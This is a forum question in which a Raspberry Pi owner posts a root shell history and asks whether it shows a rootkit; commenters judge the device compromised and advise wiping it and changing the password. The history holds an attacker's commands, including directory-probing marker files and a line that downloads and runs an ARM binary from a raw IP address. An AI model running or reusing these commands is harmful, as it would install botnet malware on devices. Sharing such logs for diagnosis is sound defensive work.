# busybox rootkit?

Tags: rootkits

I use Buildroot zImage and kernel build for my rpis and busybox for my Linux command box.

It's the second time I seem to have a rootkit, a root sh history give me that, so my question is: is it a rootkit ?

```
324  /bin/busybox cp; /gweerwe323f
  325    mount ;/gweerwe323f
  326    echo -e '\x47\x72\x6f\x70/' > //.nippon;   cat //.nippon;   rm -f //.nippon
  327    echo -e '\x47\x72\x6f\x70/tmp' > /tmp/.nippon;   cat /tmp/.nippon;   rm -f /tmp/.nippon
  328    echo -e '\x47\x72\x6f\x70/var/tmp' > /var/tmp/.nippon;   cat /var/tmp/.nippon;   rm -f /var/tmp/.nippon
  329    echo -e '\x47\x72\x6f\x70/' > //.nippon;   cat //.nippon;   rm -f //.nippon
  330    echo -e '\x47\x72\x6f\x70/dev' > /dev/.nippon;   cat /dev/.nippon;   rm -f /dev/.nippon
  331    echo -e '\x47\x72\x6f\x70/sys' > /sys/.nippon;   cat /sys/.nippon;   rm -f /sys/.nippon
  332    echo -e '\x47\x72\x6f\x70/proc' > /proc/.nippon;   cat /proc/.nippon;   rm -f /proc/.nippon
  333    echo -e '\x47\x72\x6f\x70/dev/shm' > /dev/shm/.nippon;   cat /dev/shm/.nippon;   rm -f /dev/shm/.nippon
  334    echo -e '\x47\x72\x6f\x70/dev/pts' > /dev/pts/.nippon;   cat /dev/pts/.nippon;   rm -f /dev/pts/.nippon
  335    echo -e '\x47\x72\x6f\x70/run' > /run/.nippon;   cat /run/.nippon;   rm -f /run/.nippon
  336    echo -e '\x47\x72\x6f\x70/run/lock' > /run/lock/.nippon;   cat /run/lock/.nippon;   rm -f /run/lock/.nippon
  337    echo -e '\x47\x72\x6f\x70/sys/fs/cgroup' > /sys/fs/cgroup/.nippon;   cat /sys/fs/cgroup/.nippon;   rm -f /sys/fs/cgroup/.nippon
  338    echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/systemd' > /sys/fs/cgroup/systemd/.nippon;   cat /sys/fs/cgroup/systemd/.nippon;   rm -f /sys/fs/cgroup/systemd/.nippon
  339    echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/cpuset' > /sys/fs/cgroup/cpuset/.nippon;   cat /sys/fs/cgroup/cpuset/.nippon;   rm -f /sys/fs/cgroup/cpuset/.nippon
  340    echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/cpu,cpuacct' > /sys/fs/cgroup/cpu,cpuacct/.nippon;   cat /sys/fs/cgroup/cpu,cpuacct/.nippon;   rm -f /sys/fs/cgroup/cpu,cpuacct/.nippon
  341    echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/blkio' > /sys/fs/cgroup/blkio/.nippon;   cat /sys/fs/cgroup/blkio/.nippon;   rm -f /sys/fs/cgroup/blkio/.nippon
  342    echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/devices' > /sys/fs/cgroup/devices/.nippon;   cat /sys/fs/cgroup/devices/.nippon;   rm -f /sys/fs/cgroup/devices/.nippon
  343    echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/freezer' > /sys/fs/cgroup/freezer/.nippon;   cat /sys/fs/cgroup/freezer/.nippon;   rm -f /sys/fs/cgroup/freezer/.nippon
  344    echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/net_cls' > /sys/fs/cgroup/net_cls/.nippon;   cat /sys/fs/cgroup/net_cls/.nippon;   rm -f /sys/fs/cgroup/net_cls/.nippon
  345    echo -e '\x47\x72\x6f\x70/proc/sys/fs/binfmt_misc' > /proc/sys/fs/binfmt_misc/.nippon;   cat /proc/sys/fs/binfmt_misc/.nippon;   rm -f /proc/sys/fs/binfmt_misc/.nippon
  346    echo -e '\x47\x72\x6f\x70/dev/mqueue' > /dev/mqueue/.nippon;   cat /dev/mqueue/.nippon;   rm -f /dev/mqueue/.nippon
  347    echo -e '\x47\x72\x6f\x70/sys/kernel/debug' > /sys/kernel/debug/.nippon;   cat /sys/kernel/debug/.nippon;   rm -f /sys/kernel/debug/.nippon
  348    echo -e '\x47\x72\x6f\x70/sys/kernel/config' > /sys/kernel/config/.nippon;   cat /sys/kernel/config/.nippon;   rm -f /sys/kernel/config/.nippon
  349    echo -e '\x47\x72\x6f\x70/tmp' > /tmp/.nippon;   cat /tmp/.nippon;   rm -f /tmp/.nippon
  350    echo -e '\x47\x72\x6f\x70/boot' > /boot/.nippon;   cat /boot/.nippon;   rm -f /boot/.nippon
  351    echo -e '\x47\x72\x6f\x70/run/user/0' > /run/user/0/.nippon;   cat /run/user/0/.nippon;   rm -f /run/user/0/.nippon
  352    echo -e '\x47\x72\x6f\x70/proc/sys/fs/binfmt_misc' > /proc/sys/fs/binfmt_misc/.nippon;   cat /proc/sys/fs/binfmt_misc/.nippon;   rm -f /proc/sys/fs/binfmt_misc/.nippon
  353  /gweerwe323f
  354   cat /bin/echo ;/gweerwe323f
  355    cat /proc/cpuinfo;/gweerwe323f
  356  cd /;   wget http://195.22.127.83/bins/usb_bus.arm7 -O - > usb_bus ;   chmod 777 usb_bus ; ./usb_bus ;/gweerwe323f
  357  ps aux
  358  dmesg
```

Comment: Maybe it's just me, but I'm not sure what in that list of commands is unusual. What makes you think there is a rootkit?

Comment: * firstly because it appears at a reboot on the shell history, i'm not used to see this in history commands

Comment: * secondly because there is the execution of a binary named gweerwe323f

Comment: * 3-dly : because the use of a wget directly on the / ,

Comment: Have you Googled "gweerwe323f"? I think you will find your answer

Comment: All this alert me obviously : I had the same case one year ago with a binary installed on /usr/bin and executed on the backgroud grace to the cron, I do not have any explanations about the contents of the shell history (it is not I who have typed these commands)

Comment: https://twitter.com/vessonsecurity/status/823579880738684928?lang=en-gb

Comment: Not a rootkit, but you'll definitely want to nuke your raspi. And change the password before hooking it up to the internet.